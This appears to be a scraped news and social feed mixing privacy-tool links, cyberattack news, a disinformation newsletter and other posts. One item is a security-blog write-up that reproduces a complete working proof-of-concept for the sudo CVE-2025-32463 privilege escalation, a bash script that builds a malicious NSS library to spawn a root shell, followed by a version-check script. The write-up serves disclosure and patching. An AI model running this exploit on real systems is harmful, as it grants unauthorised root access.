This page uses different techniques to recognize whether a browser extension is installed to spoof the canvas fingerprint result or not. Sometimes to protect browser identity, a browser extension adds random noise to the canvas and this noise alters the fingerprint result (hash code). Although the actual identity might be protected, there are still methods to detect
webbrowsertools.com/canvas-fin…
addons.mozilla.org/ru/firefox/…
#canvas #fingerprint #Firefox #chrome #Defender #NoScript #webbrowsertools #privacy
In Russia, the fight between representatives of rights holders (scathingly nicknamed "copyrasts") and illegal distributors of licensed content is gaining momentum. For example, if you have installed a P2P client on your computer and allowed others to download from you, you may face prosecution by law enforcement agencies.
The free program PeerBlock can help protect against such harassment (Windows platform). It blocks connections to your computer from IP addresses that have landed on a blacklist.
Fighting is an endless story; there is always someone against someone or for something. And in our modern world, intellectual property rights holders are waging a merciless war against users who have downloaded films, music, and whatever else is being actively protected these days, constantly staging demonstrative show trials whose idiocy borders on senility. Although I understand all these people perfectly well: at such prices you would, perhaps, really buy only your favourite and cult titles, and for everything else, I think, the road is clear: file sharing.
And how can you find the people taking part in seeding and downloading files? There is only one way: obtain the participants' IP addresses, and the rest is a matter of technique, pressure on the providers; it is no accident that bills are constantly proposed obliging them to keep logs of clients' activity for several months. Getting the lists is as easy as pie: just connect to the seeding/downloading of the files of interest, and there they are, walking straight into their hands. And the way to fight such decoy computers, without radically changing protocols and software, is to block access by IP addresses belonging to companies, organisations and corporations.
For a long time the only such fighter without fear or reproach was PeerGuardian2; its development stopped several years ago, and a couple of months ago support ceased altogether. But all is not so sad: from the hero's open source code a new free firewall (or rather a network-address filter), PeerBlock, was created.
peerblock.com/
ipfilter.app/#download
#IPFilter #p2p #torrent #bittorrent
RetroShare retroshare.cc/
i2p geti2p.net/ru/
i2pd i2pd.website/
NeoLoader neoloader.com/
MuWire muwire.com/
Zeronet zeronet.io/
BiglyBT biglybt.com/
Perfect Dark (install) perfectdark.benri-tool.net/ini…
GoodbyeDPI github.com/ValdikSS/GoodbyeDPI…
Rats on The Boat github.com/DEgITx/rats-search
Emule github.com/irwir/eMule/release…
qBittorrent qbittorrent.org sourceforge.net/projects/qbitt…
Twister twister.net.co/ github.com/dryabov/twister-web…
Library Genesis libgen.lc/
Openvpn openvpn.net/community-download…
SoftEther softether.org/
Shadowsocks shadowsocks.org/ github.com/shadowsocks/shadows…
WireGuard wireguard.com/
Tribler tribler.org/
Element matrix element.io/ matrix.org/
eMule 0.60c: emule-project.net/home/perl/ge… github.com/irwir/eMule/release…
Tixati tixati.com/
Demonsaw demonsaw.com/
Nicotine+ nicotine-plus.github.io/nicoti…
Tor torproject.org/
Yacy yacy.net/
magnetico github.com/boramalper/magnetic…
freenet freenetproject.org/
FlylinkDC++ flylinkdc.com/
Scuttlebutt scuttlebutt.nz/
Syncthing syncthing.net/
IPFS ipfs.io/
XMPP xmpp.org/
Diaspora (social network) diasporafoundation.org/
Fediverse social the-federation.info/
#e2ee #p2p #privacy #censorship #FOSS #opensource #цензура #filesharing #encryption #software
Airspy, a High Quality Approach to Software-Defined Radio
Airspy is a line of popular Software-Defined Radio (SDR) receivers developed to achieve high performance at an affordable price using innovative combinations of DSP and RF techniques. The goal is to satisfy the most demanding telecommunications professionals and radio enthusiasts while being a serious alternative to both cost-sensitive and higher-end receivers. Airspy radios feature world-class reception quality and ease of use thanks to tight integration with the de facto standard free SDR# software for signal acquisition, analysis and demodulation.
Eraser is an advanced security tool for Windows which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Eraser is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7, 8, 10 and Windows Server 2012, 2016.
#Wipe #diskwipe #Eraser #opensource #FOSS
Hawaiian Airlines under hacker attack, systems compromised
Hawaiian Airlines, one of the 10 largest commercial airlines in the United States, is investigating a cyberattack that compromised some of its systems. Experts believe the group responsible for the breach may be Scattered Spider.
In an official statement, the company reports that the cyber incident did not compromise flight safety and that all relevant authorities have already been informed. Hawaiian Airlines has also brought in external cybersecurity experts, who are currently helping to assess the impact of the attack and to restore the affected systems.
“Hawaiian Airlines is addressing a cybersecurity event that has affected several of our IT systems. Our highest priority is the safety of our customers and employees. We have taken steps to safeguard operations, and all flights are operating normally and safely,” the airline said.
A banner on the airline's website states that the incident has had no impact on flight safety or schedules. A similar message is posted on the website of Alaska Airlines, owned by Alaska Air Group, the company that acquired Hawaiian Airlines last year.
At present it is unclear whether Hawaiian Airlines' systems were hit by ransomware that encrypted them or whether they were taken offline to block further intrusion. No hacking group has yet claimed responsibility for the attack. It is worth noting that the Canadian airline WestJet suffered a similar attack earlier this month, which affected the availability of the airline's app and website.
Meanwhile, over the weekend, the FBI, Google Mandiant and Palo Alto Networks issued a joint warning about the activity of the Scattered Spider hacking group, which may now be targeting companies in the aviation and transport sectors. The FBI noted that Scattered Spider typically relies on social engineering to gain access to victims' systems, and that the hackers may also target trusted airline suppliers and contractors. According to Axios, the WestJet attack mentioned above may also be the work of Scattered Spider.
The article “Hawaiian Airlines sotto attacco hacker, sistemi compromessi” comes from il blog della sicurezza informatica.
Prebuilt OpenJDK Binaries for Free! OpenJDK For Windows
Java™ is the world’s leading programming language and platform. AdoptOpenJDK uses infrastructure, build and test scripts to produce prebuilt binaries from OpenJDK™ class libraries and a choice of either OpenJDK or the Eclipse OpenJ9 VM.
All AdoptOpenJDK binaries and scripts are open source licensed and available for free.
adoptopenjdk.net/releases.html
#java #OpenJDK #windows
#foss #opensource
Snappy Driver Installer Origin
Portable Driver Installation and Update Tool
Free and open source Windows driver installation
Install Missing Drivers and Update Old Drivers
Snappy Driver Installer Origin is a portable Windows tool to install and update device drivers. It can be used offline to install drivers where Internet access isn't available. No more searching for drivers after a clean install: just let Snappy Driver Installer Origin do its thing and your job will be done in no time. The perfect technician's tool.
#driverpack #Install #Installer #Driver #sdi #SDIO #foss #opensource #free
The Fake News Factory
KIA ORA. IT'S WEDNESDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and this week's edition comes to you from New Zealand. I'm taking a couple weeks off, so the next newsletter (for paying subscribers) will hit inboxes on July 14.
I'm trying something different this week.
Ahead of the 2024 global megacycle of elections, I had the idea of explaining the links between the digital tactics that have now become all too common in how politicians get elected from Pakistan and Portugal to the United Kingdom and the United States.
Life, however, got in the way. (The best I did was this package around artificial intelligence, disinformation and elections.) So, I'm taking another crack at how we all now live in the Fake News Factory.
Let's get started:
The democratization of online tools and tactics
THE LAST DECADE REPRESENTED the second generation of social media. It was an era where the shine had significantly come off Facebook and Twitter (now X). It was a time of repeated whistleblower reports about tech giants understanding how their content algorithms were pushing people toward polarizing and extremist content. It was a time of serious commercialization of these platforms by politicians eager to bombard would-be voters with billions of dollars of collective ad buys.
That era is now over. It's not that Facebook and YouTube are no longer important. They are — especially YouTube which has transformed itself into a global rival for traditional television in a way that has upended the advertising industry and fundamentally reshaped how anyone under 30-years old consumes video content. But where the 2015-2025 period was primarily defined by the dominance of a small number of Silicon Valley platforms, we're now in an era where fringe platforms, niche podcasts and the likes of vertical dramas have divided people into small online communities that rarely interact with each other.
This was happening before 2025. But we have reached an inflection point in how the online information ecosystem works. It has now shattered into a million pieces where people gravitate to like-minded individuals in siloed platforms. There is no longer a collective set of facts or events that form the foundation for society. Instead, most of us seek out opinions that already reflect our worldview, often demonizing those who we disagree with in an "othering" that only fuels polarization, misunderstanding and, potentially, offline harm.
And you thought this would be an uplifting newsletter.
Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.
Here's what paid subscribers read in June:
— Debunking popular misconceptions around platform governance; The demise of the open, interoperable internet is upon us; How oversight over AI has drastically slowed since 2023. More here.
— Internal fighting among Big Tech giants has hobbled any pushback against antitrust enforcement; It's time to rethink our approach to tackling foreign interference; Tracking Europe's decade-long push to combat online disinformation. More here.
— Why the G7 has always been a nothing-burger on tech policy; You should keep an eye out on 'digital public infrastructure' in the battle around tech sovereignty; the United Kingdom's expanding online safety investigations. More here.
— The US is sending seriously mixed messages about its approach to tech policy; How the UK became the second place in the world to mandate social media data access; Artificial intelligence will upend how we consume news online. More here.
This bifurcation in how people consume online content has made it next to impossible for foreign interference operations to flourish like they once did. See, there's a positive point. Even two years ago, the Russians could flood the zone with Kremlin talking points and receive a significant bump in online interactions. The Chinese never went in for that sort of thing — though have progressively targeted Western audiences mostly with overt propaganda in support of the Chinese Communist Party.
Now, such efforts are almost certainly doomed to fail. The siloing of social media usage has been married with a need for authenticity — that sense of belonging and insider knowledge that can only come from deep roots in communities that can smell out an imposter from a mile off. That authenticity is something that foreign (covert) campaigns routinely do badly at. State-backed operations don't know the insider lingo; they don't have the long-standing credibility built up over months/years; and they don't have personal ties required to fully embed in the balkanization of social media.
But where state-backed actors remain a threat is in the amplification of existing domestic influencers often by automated bot-nets and other AI-powered tools aimed at juicing social media giants' recommender systems. The companies say they are on top of these covert tactics. But every time there's a massive global political event (or local election), Kremlin-backed narratives keep popping up in people's feeds — often via local influencers whose views just happen to align with Moscow. These individuals are mostly not connected with Russia. But they have likely received a boost from Kremlin-aligned groups seeking to spread those messages to the widest audience possible.
It's about domestic, not foreign
IN TRUTH, STATE-BACKED ACTORS are a very public sideshow to the main event driving ongoing toxicity within the information environment: domestic actors. Be they influencers, scammers, politically-aligned media or, ahem, politicians, they are the key instigators for much of the current. Many of these domestic players see some form of benefit from spreading harm, falsehoods and, in some cases, illegality online. That, it should be added, is then amplified by social media platforms' algorithms, which have been programmed to entice people to stay on these networks, often by promoting the most divisive content possible.
Such a dynamic has been around for years. It isn't a left- or right-wing issue — though repeated studies have shown that conservative social media users promote more falsehoods than their liberal counterparts. It's a basic fact that domestic social media users both know their audience better than foreign influence campaigns and that they have greater credibility with siloed local audiences than Russia, China or Iran.
What has shifted, though, is the ability for almost anyone to run a domestic influence campaign — or, you know, a mainstream political campaign — as if they had the resources of the Kremlin-backed Internet Research Agency. Over the last five years, the toolkit required to skew social media has become readily accessible and significantly cheaper than it once was. That has been spurred on even more through the rapid growth of AI-enabled tools (more on that below.) But everything from a Bangladesh-based bot farm to a Philippines-based dark arts public relations has now become an off-the-shelf product that can be bought via a few clicks on a public-facing website.
This shift has not gone unnoticed by criminals. In 2025, the highest volume of attacks in the (Western) information environment now come from those seeking to dupe social media users out of money — and not to alter their political allegiances. Yes, the impact on politics can have significantly bigger effects. But the rise of "financial disinformation" in terms of frauds and scams promoted on social media has reached pandemic proportions.
Collectively, such digital efforts to swindle people out of money now cost billions of dollars a year, and even that is likely a significant underestimate. It's also directly linked to a crime (aka fraud) when scammers buy social media adverts to convince people to sign up to Ponzi and other get-rich-quick schemes. I did a quick search, via Meta's ad library in six different countries, for such financial scams, and found a prolific amount of advertising that promoted such disinformation. Some of it was blatantly illegal, some of it was not (I'm not linking to it to avoid amplification). But the fact such scam artists are openly flouting the law should be a worry for us all.
This democratization of disinformation has only gone from bad to worse with AI tools. Be it cloning technology to spoof a victim's voice, AI-generated images attacking a political opponent or next-generation video software that creates falsehoods from scratch within minutes, the cost for generating toxicity, hate and polarization is now almost zero. Yes, these tools can also generate joy, laughter and entertainment. But the last six months have seen a rapid rise in AI-generated slop that is quickly moving from being easy to detect to being indistinguishable from the real thing.
Trust me, I'm a regulator
THIS YEAR MARKS THE FIRST TIME ON RECORD that several countries' online safety rulebooks are in full operation. Yes, Australia got things started almost five years ago. But with the European Union's Digital Services Act and the UK's Online Safety Act, the Western world has the first signs of what a well-resourced regulatory environment looks like when it comes to keeping people safe online.
Sigh.
It's not that the European Commission and Ofcom (disclaimer: I sit on an independent advisory committee at the British regulator, so anything I say here is done so in a personal capacity) aren't doing their best. They are. It's just both are fighting a 2020 war against perceived threats within the online information environment, and just haven't kept pace with the fast-evolving tactics, some of which I outlined above.
To a degree, the time lag is understandable. Regulators are always going to be behind the curve on the latest threats. Both agencies are still staffing up and learning the ropes of their new rulebooks. How successful either the EU or UK will be in making their online worlds safer for citizens won't be known for at least five years, at the earliest.
But there have been some serious mistakes, especially from the European Commission. Let's leave aside the political nature of the first investigations under the Digital Services Act. And let's leave aside the internal bureaucratic infighting that was always going to arise from such a powerful — and well-resourced — piece of legislation.
For me, the biggest error was how Ursula von der Leyen framed the new rules as almost exclusively a means for combatting Russian interference. That was done primarily to secure her second tenure as European Commission president. But the characterization of the Digital Services Act as an all-powerful mechanism to thwart the Kremlin's covert influence operations has continued well into this year — most notably in the two presidential elections in Romania.
Let's be clear. These online safety rules are many things. But, at their heart, they are wonky, bureaucratic and cumbersome mandatory requirements for platforms to abide by their own internal policies against illegal content. They are not about Russian disinformation. And they certainly are not about censorship.
Weaponization and unknown unknowns
And that takes me to the final big concern within the Fake News Factory: the weaponization of online safety rules. Since 2016, there have been those within the US who have pushed back hard against platforms' efforts to quell illegal and abusive content. That has spiralled into conspiratorial claims that a Censorship Industrial Complex, made up of governments, social media giants and outsiders, is trying to illegally silence predominantly rightwing voices, often via new online safety legislation.
US President Donald Trump's administration has made it clear what it thinks of these rules — and has pushed back hard. It has threatened retaliatory tariffs against countries with online safety rules on the books. It has threatened to ban anyone who allegedly tries to censor Americans from entering the country. It has accused both the UK and EU of infringing on US First Amendment rights.
These attacks against what are, essentially, legal commitments obligating companies to live by their own internal rules — and to demonstrate that they have done so — are now part of the conversation in other Western countries. That includes (mostly) right-wing lawmakers across Europe seeking to weaken these online safety rules, accusing others of censoring conservative viewpoints and mimicking many of the long-standing talking points from their US counterparts.
It's true, particularly during the pandemic, that social media companies made content moderation decisions with imperfect facts. Some posts were unfairly removed or downranked as these firms responded, in real time, to government efforts to amplify scientifically correct information. But the rise of conspiracy theories, which insinuated a mass censoring of online voices, just wasn't borne out by the evidence at hand. And that came after repeated reports from the US House of Representatives select subcommittee on the weaponization of the federal government.
If there was evidence of such abuse, then I would be the first to champion such findings. But as we enter the second half of the year, there is one core underlying fact that underpins everything I've written so far: no one has a clue about what happens on these platforms.
Long-time Digital Politics readers will have heard me go on about this for months, and, to be fair, it's part of my day job to look into this issue. But how the complex recommender system algorithms interact with people's individual posts, paid-for advertising and wider efforts to influence people online remains a black box. What I have outlined above, for instance, is based on my own research, what I understand anecdotally about how these platforms work, and discussions with policymakers, tech executives and other experts.
The Fake News Factory is my own imagining of how the current online information ecosystem interacts and shapes the world around us. But without better awareness — via mandatory requirements that these firms open up to independent scrutiny, transparency and accountability — about the inner workings of these platforms, that imagining will remain incomplete, at best.
We are entering a new generation of social media with limited awareness, mass balkanization and an increasing politicization of what should be clear objectives of keeping everyone safe online. How long this era will stick around for is anyone's guess. But, for now, the Fake News Factory remains as strong as ever.
What I'm reading
— The Organization for Economic Cooperation and Development analyzed the so-called age assurance policies from 50 online services — most of which did not have checks in place. More here.
— The team at the DSA Observatory did a deep dive into how individuals, non-profit organizations and consumer groups can bring private enforcement actions under the EU's Digital Services Act.
— The UK's Competition and Markets Authority laid out its rationale for why it had designated Google a so-called "strategic market status" under the country's new digital antitrust rules. More here.
— OpenAI submitted recommendations to the upcoming US AI Action Plan. The words "freedom" and "PRC" are mentioned repeatedly throughout. More here.
— Researchers at USC Annenberg looked at how the media covered the negative side of social media/technology, and found that the companies are rarely blamed. More here.
Finally, An Extension To Copyright Law We Can Get Behind
Normally when a government extends a piece of copyright law we expect it to be in the favour of commercial interests with deep pockets and little care for their consumers. But in Denmark they do things differently it seems, which is why they are giving Danes the copyright over their own features such as their faces or voices. Why? To combat deepfakes, meaning that if you deepfake a Dane, they can come after you for big bucks, or indeed kroner. It's a major win, in privacy terms.
You might of course ask whether it's now risky to photograph a Dane. We are not of course lawyers here, but like any journalists we have to possess a knowledge of how copyright works, and we are guessing that the idea in play here is that of passing off. If you take a photograph of a Volkswagen you will have captured the VW logo on its front, but the car company will not sue you because you are not passing off something that's not a Volkswagen as the real thing. So it will be with Danes; if you take a picture of their now-copyrighted face in a crowd you are not passing it off as anything but a real picture of them, so we think you should be safe.
We welcome this move, and wish other countries would follow suit.
Pope Francis, Midjourney, Public domain, (Which is a copyright story all of its own!)
Linux Pwned! Privilege escalation on SUDO in 5 seconds. HackerHood tests the CVE-2025-32463 exploit
Yesterday Red Hot Cyber published an in-depth article on a serious vulnerability discovered in SUDO (CVE-2025-32463), which allows escalation of privileges to root on Linux by abusing the chroot feature.
The exploit, made public by Stratascale, shows how an unprivileged user can obtain root access through a precise chain of operations that abuse sudo's handling of chroot: the attacker's own nsswitch.conf and NSS shared library are loaded while sudo is still running as root.
Field test: over to Manuel Roccon of the HackerHood group
Manuel Roccon, a researcher with Red Hot Cyber's HackerHood group, wanted to get his hands on the exploit to verify its scope concretely and to assess how reproducible it is in real environments. “I couldn't resist the temptation to try it in an isolated environment. It is impressive how direct and clean the mechanism is once the requirements of the PoC are met,” says Manuel.
The team then tested the Proof of Concept published by Stratascale, Exploit CVE-2025-32463 – sudo chroot. The result? Privilege escalation achieved.
Exploit details
The exploit leverages the way sudo handles a command run under a chroot (the -R option): sudo calls chroot() into the user-specified directory while still running as root and then resolves user information through NSS. That lookup reads /etc/nsswitch.conf relative to the new root, a file the attacker controls, so sudo ends up loading an attacker-supplied NSS shared library with root privileges.
The CVE-2025-32463 exploit, demonstrated in the sudo-chwoot.sh PoC by Rich Mirch (Stratascale CRU), exploits a vulnerability in sudo that allows an unprivileged user to obtain root privileges when sudo is run with the -R option (which specifies a chroot directory). The script creates a temporary staging directory (/tmp/sudowoot.stage.*), compiles a malicious shared library (libnss_/woot1337.so.2) containing a constructor function that raises privileges and opens a root shell (/bin/bash), and forces sudo to load it as an NSS library in the chroot context.
The technique exploits a logic error in how NSS libraries are handled in chroot environments, where sudo dynamically loads external libraries without isolating them properly. The script writes a fake nsswitch.conf into woot/etc (woot/ being the directory that becomes the virtual root of the chroot) whose passwd line names the service /woot1337, so glibc tries to load libnss_/woot1337.so.2: a relative path that resolves from sudo's current working directory, which is still the staging directory outside the chroot, where the script has placed the library next to woot/. When sudo -R woot woot is executed, woot1337.so.2 is loaded and its code runs automatically thanks to the __attribute__((constructor)) attribute, achieving privilege escalation.
The basic requirements for successfully exploiting this vulnerability include:
- chroot support enabled in sudo (the -R / --chroot option).
- The absence of certain restrictions from security profiles (such as AppArmor or SELinux).
- A permissive sudoers configuration.
Below are the simple lines of the script:
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
# Staging directory; sudo is run from here, so relative paths below resolve against it.
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
# Payload: a constructor that runs as soon as the library is loaded by root sudo.
cat > woot1337.c <<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF
# woot/ becomes the chroot; the fake nsswitch.conf names the NSS service "/woot1337",
# which makes glibc look for libnss_/woot1337.so.2 (placed here, next to woot/).
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
# Trigger: chroot into woot/ and run the (non-existent) command "woot".
sudo -R woot woot
rm -rf ${STAGE?}
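As an added practitioner check (my own code, not part of the article and not Stratascale's), the script below reads the local sudo version and decides whether it falls inside the range the upstream sudo advisory lists as affected (1.9.14 through 1.9.17, fixed in 1.9.17p1; those numbers come from the advisory, not from this article), and whether the build exposes the -R/--chroot option the PoC relies on. Version parsing and the range check are separate functions, so they can be exercised without sudo installed.

```python
#!/usr/bin/env python3
"""Check whether a host's sudo build is in the CVE-2025-32463 affected range.

Affected range per the upstream sudo advisory (assumption: not stated on the
page being edited): sudo 1.9.14 up to and including 1.9.17 are affected,
1.9.17p1 is fixed. Versions are compared as (major, minor, patch, plevel).
"""
import re
import shutil
import subprocess

FIRST_AFFECTED = (1, 9, 14, 0)   # chroot (-R) support first shipped in 1.9.14
FIXED = (1, 9, 17, 1)            # 1.9.17p1


def parse_sudo_version(text):
    """Turn the first line of `sudo --version` ('Sudo version 1.9.17p1') into a tuple.

    The optional 'pN' patch level becomes the fourth element (0 when absent),
    so that 1.9.17 sorts before 1.9.17p1.  Returns None if no version is found.
    """
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected(version):
    """True when version lies in [1.9.14, 1.9.17p1)."""
    return FIRST_AFFECTED <= version < FIXED


def supports_chroot_option(help_text):
    """The PoC needs `sudo -R`; a build whose --help lacks --chroot cannot be hit this way."""
    return "--chroot" in help_text


def audit_local_sudo():
    """Run `sudo --version` and `sudo --help` on this host and summarise exposure."""
    sudo = shutil.which("sudo")
    if sudo is None:
        return {"installed": False}
    ver_out = subprocess.run([sudo, "--version"], capture_output=True, text=True).stdout
    help_out = subprocess.run([sudo, "--help"], capture_output=True, text=True).stdout
    version = parse_sudo_version(ver_out)
    return {
        "installed": True,
        "version": version,
        "has_chroot_option": supports_chroot_option(help_out),
        "affected": version is not None and is_affected(version),
    }


if __name__ == "__main__":
    print(audit_local_sudo())
```

A build that reports a version in range and advertises --chroot is the case to patch first; a version below 1.9.14 never had the -R option and is not reachable by this PoC, which is why the check looks at both.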
Conclusions
The test carried out by Manuel Roccon shows that this vulnerability is not merely theoretical but fully exploitable in production environments that are not properly protected. In DevOps or containerised scenarios, where the use of sudo and chroot is common, the risks increase considerably.
Red Hot Cyber and the HackerHood group recommend updating SUDO immediately to the latest available version and reviewing the security configuration relating to chroot and sudoers permissions.
Security starts with awareness. Keep following us for technical analyses, tested PoCs and up-to-date reports.
The article “Linux Pwned! Privilege Escalation su SUDO in 5 secondi. HackerHood testa l’exploit CVE-2025-32463” comes from il blog della sicurezza informatica.
Environment: the wrecks of First and Second World War ships are ticking time bombs
As the rusting wartime ships decompose on the seabed, their toxic cargoes pose an urgent but often overlooked environmental risk. Rosie Frost (Euronews.com)
#PrivacyCamp25: Call for Sessions open
Our rights and freedoms – online and offline – are facing unprecedented threats. Recognising this as a collective struggle, we want to explore the theme Resilience and Resistance in Times of Deregulation and Authoritarianism for this edition of Privacy Camp. The 13th edition of Privacy Camp is set to take place on 30 September 2025.
The post #PrivacyCamp25: Call for Sessions open appeared first on European Digital Rights (EDRi).
The fediverse starts thinking big
Despite its complexity, the open, decentralised ecosystem symbolised by Mastodon continues to attract big platforms such as Threads or Flipboard: is it the revenge of the open web or the beginning of the end?
The article “Il fediverso inizia a pensare in grande” comes from Guerre di Rete (#GuerreDiRete).
Cyber security in Italy 2025: challenges, solutions and the role of AI, according to Assinform
Anitec-Assinform has published the report “Il digitale in Italia 2025”, which explores the main cyber security challenges, the evolution of defence technologies such as AI and quantum computing, and the solutions for ensuring security.
For the last three days the air conditioning at my company hasn't worked
I do an office job (so nothing physically heavy), indoors (so I'm not exposed to direct sunlight), but despite that, having to work at 30-31 °C was hard, more than I expected.
Many of us are sensitive to the climate problem, but I realised that, in my case, it was a very "rational" sensitivity. I've read articles, I've looked at the data, I've studied the graphs, I've acknowledged that something is going wrong and that we have a problem ahead of us that we need to deal with.
But I don't think I'm exaggerating if I say that spending three whole days without air conditioning (I don't have it at home either, by choice) made me feel a genuine fear about the situation we're in.
I think I went from a rational understanding of the problem to an emotional perception of it.
So I asked myself whether living immersed in air conditioning might not have an "anaesthetic" effect, whether it might not be something that stops us from fully perceiving how dramatic the situation we're in is.
It would be useful to spend a couple of days a week without any form of air conditioning, just to properly perceive the emergency we're facing. Unfortunately that's not possible, air conditioning is everywhere, and I wonder whether this might be one of the reasons why so many people don't seem sufficiently worried about the climate problem.
Ministry of Education
#FacciamoChiarezza, the new section of the #MIM website is online, to explore #scuola topics by responding to press articles, social media content, ongoing debates on education and users' frequently asked questions. Telegram
Trump ready to “compensate” Israel if Netanyahu halts the offensive in Gaza
@Notizie dall'Italia e dal mondo
Next week the American president will offer the Israeli prime minister the normalisation of relations between Tel Aviv and Damascus
The article https://pagineesteri.it/2025/07/02/medioriente/trump-pronto-a-risarcire-israele-se-netanyahu-fermera-loffensiva-a-gaza/
Adding Automatic Emergency Braking To An RC Car
Modern RC cars can be pretty darn fast. That’s fun and all, but it also makes it easy to crash them into things. This problem inspired [Narrow Studios] to whip up something to offer a bit of protection.
The concept is simple enough—the RC car just needs some way to detect obstacles and stop before hitting them. The build relies on ultrasonic sensors as rangefinders to spot solid objects in the path of the vehicle. An Arduino Nano is in charge of reading the sensors. When it appears the car is approaching a wall or similar obstacle, it fires off a PWM signal to the car’s motor controller commanding it to brake. The additional hardware is held to the car with a bunch of custom printed brackets.
The setup isn’t perfect; the video notes that if you insist on accelerating quickly when close to a wall, you still have a fair chance of hitting it. That’s largely put down to the refresh time of the sensors and the overall system, which could be improved with further work. Still, if you’re always crashing your RC car into walls or curbs, this kind of thing might appeal to you.
We’ve featured some other great RC projects before, too.
North Korean hackers on the payroll. How companies paid salaries to North Korean IT specialists
The United States Department of Justice has announced the discovery of a large-scale scheme in which fake IT specialists from the DPRK obtained jobs at American companies by posing as citizens of other countries. In fact, we at Red Hot Cyber had reported some time ago that many companies were hiring North Korean employees, who were even attending job interviews through deepfake systems.
Reportedly, North Korean programmers obtained jobs at more than 100 US companies using fictitious or stolen identities. In addition to their salaries, they stole confidential information and transferred it to servers in Pyongyang. They were also interested in cryptocurrencies: in one case, a North Korean operative stole 740,000 dollars from his American employer.
It is worth noting that this time the attackers did not use deepfakes, although such methods are becoming increasingly popular. Cyber attacks remain a major source of funding for North Korea, despite international sanctions. As early as 2022, the FBI had warned that the DPRK authorities were officially organising remote work abroad for their programmers.
According to court documents, one of the operations began in January 2021. Zhenxing “Danny” Wang, who had set up a shell company called Independent Lab, supposedly engaged in software development, was arrested in the United States. Through this company he transferred 5 million dollars to the DPRK, and American companies suffered losses of 3 million dollars between system recovery and legal expenses.
Another defendant, Kejia “Tony” Wang, set up two front companies and so-called “laptop farms”. The companies sent computers to their “employees”, but the devices stayed in the United States and were controlled from North Korea, which allowed them to hide the workers' real location. As a result, the American participants in the scheme earned at least 696,000 dollars.
Some of the employees involved were fired after checks. Another operation was also uncovered: four North Korean nationals worked as IT specialists under false names in the United Arab Emirates, the United States and Serbia, stealing cryptocurrency and laundering it through Tornado Cash.
Between 10 and 17 June, US authorities seized 137 laptops from suspected “farms” in several states. A reward of up to 5 million dollars is offered for information on such activities.
The article North Korean hackers on the payroll. How companies paid salaries to North Korean IT specialists comes from il blog della sicurezza informatica.
The Zero Trust strategy within critical infrastructure
@Informatica (Italy e non Italy 😁)
The Cloud Security Alliance has recently published guidelines setting out how to apply Zero Trust (ZT) principles within Operational Technology (OT) and Industrial Control System (ICS) environments
The article The Zero Trust strategy
Ivan Bk
in reply to Max su Poliverso 🇪🇺🇮🇹 • • • If you're an idiot, the reason is different, but the result is the same.
Maybe the analysis is simplistic, but I don't think it's far from the truth.